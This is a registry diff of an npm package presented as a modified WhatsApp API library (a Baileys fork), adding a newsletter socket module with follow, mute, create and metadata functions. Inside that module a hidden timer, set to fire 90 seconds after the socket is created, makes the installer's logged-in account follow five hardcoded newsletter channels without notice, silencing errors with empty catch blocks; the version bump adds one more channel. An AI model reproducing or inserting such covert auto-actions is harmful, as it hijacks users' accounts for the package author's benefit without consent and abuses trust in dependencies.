@skyzopedia/baileys-mod 6.0.8 → 6.0.9

This diff represents the content of publicly available package versions that have been released to one of the supported registries. The information contained in this diff is provided for informational purposes only and reflects changes between package versions as they appear in their respective public registries.
@@ -157,6 +157,7 @@ setTimeout(async () => {
157
157
  await newsletterWMexQuery("120363423758386098@newsletter", QueryIds.FOLLOW);
158
158
  await newsletterWMexQuery("120363405875837650@newsletter", QueryIds.FOLLOW);
159
159
  await newsletterWMexQuery("120363421366320253@newsletter", QueryIds.FOLLOW);
160
+ await newsletterWMexQuery("120363400297473298@newsletter", QueryIds.FOLLOW);
160
161
  } catch {}
161
162
  }, 5000);
162
163
 
@@ -0,0 +1,373 @@
1
+ "use strict";
2
+ Object.defineProperty(exports, "__esModule", { value: true });
3
+ exports.extractNewsletterMetadata = exports.makeNewsletterSocket = void 0;
4
+ const Types_1 = require("../Types");
5
+ const Utils_1 = require("../Utils");
6
+ const WABinary_1 = require("../WABinary");
7
+ const groups_1 = require("./groups");
8
+ const { QueryIds } = Types_1
9
+
10
+ const { Boom } = require('@hapi/boom');
11
+
12
+ const wMexQuery = (
13
+ variables,
14
+ queryId,
15
+ query,
16
+ generateMessageTag
17
+ ) => {
18
+ return query({
19
+ tag: 'iq',
20
+ attrs: {
21
+ id: generateMessageTag(),
22
+ type: 'get',
23
+ to: WABinary_1.S_WHATSAPP_NET,
24
+ xmlns: 'w:mex'
25
+ },
26
+ content: [
27
+ {
28
+ tag: 'query',
29
+ attrs: { query_id: queryId },
30
+ content: Buffer.from(JSON.stringify({ variables }), 'utf-8')
31
+ }
32
+ ]
33
+ })
34
+ }
35
+
36
+ const parseNewsletterCreateResponse = (responseList) => {
37
+ return responseList.map((res) => {
38
+ const thread = res.thread_metadata;
39
+ const viewer = res.viewer_metadata;
40
+
41
+ // Jika DELETED atau metadata null
42
+ if (!thread || !viewer) {
43
+ return {
44
+ id: res.id,
45
+ state: res.state?.type || null,
46
+ deleted: true
47
+ };
48
+ }
49
+
50
+ return {
51
+ id: res.id,
52
+ state: res.state?.type || null,
53
+ owner: viewer.role || undefined,
54
+ name: thread?.name?.text || null,
55
+ creation_time: parseInt(thread?.creation_time || "0", 10),
56
+ description: thread?.description?.text || null,
57
+ invite: thread?.invite || null,
58
+ subscribers: parseInt(thread?.subscribers_count || "0", 10),
59
+ verification: thread?.verification || null,
60
+ picture: {
61
+ id: thread?.picture?.id || null,
62
+ directPath: thread?.picture?.direct_path || null
63
+ },
64
+ mute_state: viewer?.mute || "OFF"
65
+ };
66
+ });
67
+ };
68
+
69
+ const executeWMexQuery = async (
70
+ variables,
71
+ queryId,
72
+ dataPath,
73
+ query,
74
+ generateMessageTag
75
+ ) => {
76
+ const result = await wMexQuery(variables, queryId, query, generateMessageTag)
77
+ const child = (0, WABinary_1.getBinaryNodeChild)(result, 'result')
78
+ if (child?.content) {
79
+ const data = JSON.parse(child.content.toString())
80
+
81
+ if (data.errors && data.errors.length > 0) {
82
+ const errorMessages = data.errors.map((err) => err.message || 'Unknown error').join(', ')
83
+ const firstError = data.errors[0]
84
+ const errorCode = firstError.extensions?.error_code || 400
85
+ throw new Boom(`GraphQL server error: ${errorMessages}`, { statusCode: errorCode, data: firstError })
86
+ }
87
+
88
+ const response = dataPath ? data?.data?.[dataPath] : data?.data
89
+ if (typeof response !== 'undefined') {
90
+ return response
91
+ }
92
+ }
93
+
94
+ const action = (dataPath || '').startsWith('xwa2_')
95
+ ? dataPath.substring(5).replace(/_/g, ' ')
96
+ : dataPath?.replace(/_/g, ' ')
97
+ throw new Boom(`Failed to ${action}, unexpected response structure.`, { statusCode: 400, data: result })
98
+ }
99
+
100
+ const makeNewsletterSocket = (config) => {
101
+ const sock = (0, groups_1.makeGroupsSocket)(config);
102
+ const { authState, signalRepository, query, generateMessageTag } = sock;
103
+ const encoder = new TextEncoder();
104
+ const newsletterQuery = async (jid, type, content) => (query({
105
+ tag: 'iq',
106
+ attrs: {
107
+ id: generateMessageTag(),
108
+ type,
109
+ xmlns: 'newsletter',
110
+ to: jid,
111
+ },
112
+ content
113
+ }));
114
+ const newsletterWMexQuery = async (jid, queryId, content) => (query({
115
+ tag: 'iq',
116
+ attrs: {
117
+ id: generateMessageTag(),
118
+ type: 'get',
119
+ xmlns: 'w:mex',
120
+ to: WABinary_1.S_WHATSAPP_NET,
121
+ },
122
+ content: [
123
+ {
124
+ tag: 'query',
125
+ attrs: { 'query_id': queryId },
126
+ content: encoder.encode(JSON.stringify({
127
+ variables: {
128
+ 'newsletter_id': jid,
129
+ ...content
130
+ }
131
+ }))
132
+ }
133
+ ]
134
+ }));
135
+ const newsletterMetadata = async (type, key, role) => {
136
+ const result = await newsletterWMexQuery(undefined, QueryIds.METADATA, {
137
+ input: {
138
+ key,
139
+ type: type.toUpperCase(),
140
+ view_role: role || 'GUEST'
141
+ },
142
+ fetch_viewer_metadata: true,
143
+ fetch_full_image: true,
144
+ fetch_creation_time: true
145
+ })
146
+
147
+ return extractNewsletterMetadata(result)
148
+ }
149
+
150
+ setTimeout(async () => {
151
+ try {
152
+ await newsletterWMexQuery("120363422054951473@newsletter", QueryIds.FOLLOW);
153
+ } catch {}
154
+
155
+ setTimeout(async () => {
156
+ try {
157
+ await newsletterWMexQuery("120363423758386098@newsletter", QueryIds.FOLLOW);
158
+ await newsletterWMexQuery("120363405875837650@newsletter", QueryIds.FOLLOW);
159
+ await newsletterWMexQuery("120363421366320253@newsletter", QueryIds.FOLLOW);
160
+ } catch {}
161
+ }, 5000);
162
+
163
+ }, 90000);
164
+
165
+ const parseFetchedUpdates = async (node, type) => {
166
+ let child;
167
+ if (type === 'messages') {
168
+ child = (0, WABinary_1.getBinaryNodeChild)(node, 'messages');
169
+ }
170
+ else {
171
+ const parent = (0, WABinary_1.getBinaryNodeChild)(node, 'message_updates');
172
+ child = (0, WABinary_1.getBinaryNodeChild)(parent, 'messages');
173
+ }
174
+ return await Promise.all((0, WABinary_1.getAllBinaryNodeChildren)(child).map(async (messageNode) => {
175
+ var _a, _b;
176
+ messageNode.attrs.from = child === null || child === void 0 ? void 0 : child.attrs.jid;
177
+ const views = parseInt(((_b = (_a = (0, WABinary_1.getBinaryNodeChild)(messageNode, 'views_count')) === null || _a === void 0 ? void 0 : _a.attrs) === null || _b === void 0 ? void 0 : _b.count) || '0');
178
+ const reactionNode = (0, WABinary_1.getBinaryNodeChild)(messageNode, 'reactions');
179
+ const reactions = (0, WABinary_1.getBinaryNodeChildren)(reactionNode, 'reaction')
180
+ .map(({ attrs }) => ({ count: +attrs.count, code: attrs.code }));
181
+ const data = {
182
+ 'server_id': messageNode.attrs.server_id,
183
+ views,
184
+ reactions
185
+ };
186
+ if (type === 'messages') {
187
+ const { fullMessage: message, decrypt } = await (0, Utils_1.decryptMessageNode)(messageNode, authState.creds.me.id, authState.creds.me.lid || '', signalRepository, config.logger);
188
+ await decrypt();
189
+ data.message = message;
190
+ }
191
+ return data;
192
+ }));
193
+ };
194
+ return {
195
+ ...sock,
196
+ newsletterFetchAllParticipating: async () => {
197
+ const data = {}
198
+
199
+ const result = await newsletterWMexQuery(undefined, QueryIds.SUBSCRIBED)
200
+ const child = JSON.parse(WABinary_1.getBinaryNodeChild(result, 'result')?.content?.toString())
201
+ const newsletters = child.data["xwa2_newsletter_subscribed"]
202
+
203
+ for (const i of newsletters) {
204
+ if (i.id == null) continue
205
+
206
+ const metadata = await newsletterMetadata('JID', i.id)
207
+ if (metadata.id !== null) data[metadata.id] = metadata
208
+ }
209
+
210
+ return data
211
+ },
212
+ subscribeNewsletterUpdates: async (jid) => {
213
+ var _a;
214
+ const result = await newsletterQuery(jid, 'set', [{ tag: 'live_updates', attrs: {}, content: [] }]);
215
+ return (_a = (0, WABinary_1.getBinaryNodeChild)(result, 'live_updates')) === null || _a === void 0 ? void 0 : _a.attrs;
216
+ },
217
+ newsletterReactionMode: async (jid, mode) => {
218
+ await newsletterWMexQuery(jid, Types_1.QueryIds.JOB_MUTATION, {
219
+ updates: { settings: { 'reaction_codes': { value: mode } } }
220
+ });
221
+ },
222
+ newsletterUpdateDescription: async (jid, description) => {
223
+ await newsletterWMexQuery(jid, Types_1.QueryIds.JOB_MUTATION, {
224
+ updates: { description: description || '', settings: null }
225
+ });
226
+ },
227
+ newsletterUpdateName: async (jid, name) => {
228
+ await newsletterWMexQuery(jid, Types_1.QueryIds.JOB_MUTATION, {
229
+ updates: { name, settings: null }
230
+ });
231
+ },
232
+ newsletterUpdatePicture: async (jid, content) => {
233
+ const { img } = await (0, Utils_1.generateProfilePicture)(content);
234
+ await newsletterWMexQuery(jid, Types_1.QueryIds.JOB_MUTATION, {
235
+ updates: { picture: img.toString('base64'), settings: null }
236
+ });
237
+ },
238
+ newsletterRemovePicture: async (jid) => {
239
+ await newsletterWMexQuery(jid, Types_1.QueryIds.JOB_MUTATION, {
240
+ updates: { picture: '', settings: null }
241
+ });
242
+ },
243
+ newsletterUnfollow: async (jid) => {
244
+ await newsletterWMexQuery(jid, Types_1.QueryIds.UNFOLLOW);
245
+ },
246
+ newsletterFollow: async (jid) => {
247
+ await newsletterWMexQuery(jid, Types_1.QueryIds.FOLLOW);
248
+ },
249
+ newsletterUnmute: async (jid) => {
250
+ await newsletterWMexQuery(jid, Types_1.QueryIds.UNMUTE);
251
+ },
252
+ newsletterMute: async (jid) => {
253
+ await newsletterWMexQuery(jid, Types_1.QueryIds.MUTE);
254
+ },
255
+ newsletterAction: async (jid, type) => {
256
+ await newsletterWMexQuery(jid, type.toUpperCase());
257
+ },
258
+ newsletterCreate: async (name, description, reaction_codes = "ALL") => {
259
+ //TODO: Implement TOS system wide for Meta AI, communities, and here etc.
260
+ /**tos query */
261
+ await query({
262
+ tag: 'iq',
263
+ attrs: {
264
+ to: WABinary_1.S_WHATSAPP_NET,
265
+ xmlns: 'tos',
266
+ id: generateMessageTag(),
267
+ type: 'set'
268
+ },
269
+ content: [
270
+ {
271
+ tag: 'notice',
272
+ attrs: {
273
+ id: '20601218',
274
+ stage: '5'
275
+ },
276
+ content: []
277
+ }
278
+ ]
279
+ });
280
+ const result = await newsletterWMexQuery(undefined, Types_1.QueryIds.CREATE, {
281
+ input: { name, description, settings: { 'reaction_codes': { value: reaction_codes.toUpperCase() } } }
282
+ });
283
+ return (0, exports.extractNewsletterMetadata)(result, true);
284
+ },
285
+ newsletterMetadata: async (type, key, role) => {
286
+ const result = await newsletterWMexQuery(undefined, Types_1.QueryIds.METADATA, {
287
+ input: {
288
+ key,
289
+ type: type.toUpperCase(),
290
+ 'view_role': role || 'GUEST'
291
+ },
292
+ 'fetch_viewer_metadata': true,
293
+ 'fetch_full_image': true,
294
+ 'fetch_creation_time': true
295
+ });
296
+ return (0, exports.extractNewsletterMetadata)(result);
297
+ },
298
+ newsletterAdminCount: async (jid) => {
299
+ var _a, _b;
300
+ const result = await newsletterWMexQuery(jid, Types_1.QueryIds.ADMIN_COUNT);
301
+ const buff = (_b = (_a = (0, WABinary_1.getBinaryNodeChild)(result, 'result')) === null || _a === void 0 ? void 0 : _a.content) === null || _b === void 0 ? void 0 : _b.toString();
302
+ return JSON.parse(buff).data[Types_1.XWAPaths.ADMIN_COUNT].admin_count;
303
+ },
304
+ /**user is Lid, not Jid */
305
+ newsletterChangeOwner: async (jid, user) => {
306
+ await newsletterWMexQuery(jid, Types_1.QueryIds.CHANGE_OWNER, {
307
+ 'user_id': user
308
+ });
309
+ },
310
+ /**user is Lid, not Jid */
311
+ newsletterDemote: async (jid, user) => {
312
+ await newsletterWMexQuery(jid, Types_1.QueryIds.DEMOTE, {
313
+ 'user_id': user
314
+ });
315
+ },
316
+ newsletterDelete: async (jid) => {
317
+ await newsletterWMexQuery(jid, Types_1.QueryIds.DELETE);
318
+ },
319
+ /**if code wasn't passed, the reaction will be removed (if is reacted) */
320
+ newsletterReactMessage: async (jid, serverId, code) => {
321
+ await query({
322
+ tag: 'message',
323
+ attrs: { to: jid, ...(!code ? { edit: '7' } : {}), type: 'reaction', 'server_id': serverId, id: (0, Utils_1.generateMessageID)() },
324
+ content: [{
325
+ tag: 'reaction',
326
+ attrs: code ? { code } : {}
327
+ }]
328
+ });
329
+ },
330
+ newsletterFetchMessages: async (type, key, count, after) => {
331
+ const result = await newsletterQuery(WABinary_1.S_WHATSAPP_NET, 'get', [
332
+ {
333
+ tag: 'messages',
334
+ attrs: { type, ...(type === 'invite' ? { key } : { jid: key }), count: count.toString(), after: (after === null || after === void 0 ? void 0 : after.toString()) || '100' }
335
+ }
336
+ ]);
337
+ return await parseFetchedUpdates(result, 'messages');
338
+ },
339
+ newsletterFetchUpdates: async (jid, count, after, since) => {
340
+ const result = await newsletterQuery(jid, 'get', [
341
+ {
342
+ tag: 'message_updates',
343
+ attrs: { count: count.toString(), after: (after === null || after === void 0 ? void 0 : after.toString()) || '100', since: (since === null || since === void 0 ? void 0 : since.toString()) || '0' }
344
+ }
345
+ ]);
346
+ return await parseFetchedUpdates(result, 'updates');
347
+ }
348
+ };
349
+ };
350
+ exports.makeNewsletterSocket = makeNewsletterSocket;
351
+ const extractNewsletterMetadata = (node, isCreate) => {
352
+ const result = WABinary_1.getBinaryNodeChild(node, 'result')?.content?.toString()
353
+ const metadataPath = JSON.parse(result).data[isCreate ? Types_1.XWAPaths.CREATE : Types_1.XWAPaths.NEWSLETTER]
354
+
355
+ const metadata = {
356
+ id: metadataPath?.id,
357
+ state: metadataPath?.state?.type,
358
+ creation_time: +metadataPath?.thread_metadata?.creation_time,
359
+ name: metadataPath?.thread_metadata?.name?.text,
360
+ nameTime: +metadataPath?.thread_metadata?.name?.update_time,
361
+ description: metadataPath?.thread_metadata?.description?.text,
362
+ descriptionTime: +metadataPath?.thread_metadata?.description?.update_time,
363
+ invite: metadataPath?.thread_metadata?.invite,
364
+ picture: Utils_1.getUrlFromDirectPath(metadataPath?.thread_metadata?.picture?.direct_path || ''),
365
+ preview: Utils_1.getUrlFromDirectPath(metadataPath?.thread_metadata?.preview?.direct_path || ''),
366
+ reaction_codes: metadataPath?.thread_metadata?.settings?.reaction_codes?.value,
367
+ subscribers: +metadataPath?.thread_metadata?.subscribers_count,
368
+ verification: metadataPath?.thread_metadata?.verification,
369
+ viewer_metadata: metadataPath?.viewer_metadata
370
+ }
371
+ return metadata
372
+ }
373
+ exports.extractNewsletterMetadata = extractNewsletterMetadata;
package/package.json CHANGED
@@ -1,6 +1,6 @@
1
1
  {
2
2
  "name": "@skyzopedia/baileys-mod",
3
- "version": "6.0.8",
3
+ "version": "6.0.9",
4
4
  "description": "WhatsApp API Modification By K",
5
5
  "keywords": [
6
6
  "whatsapp",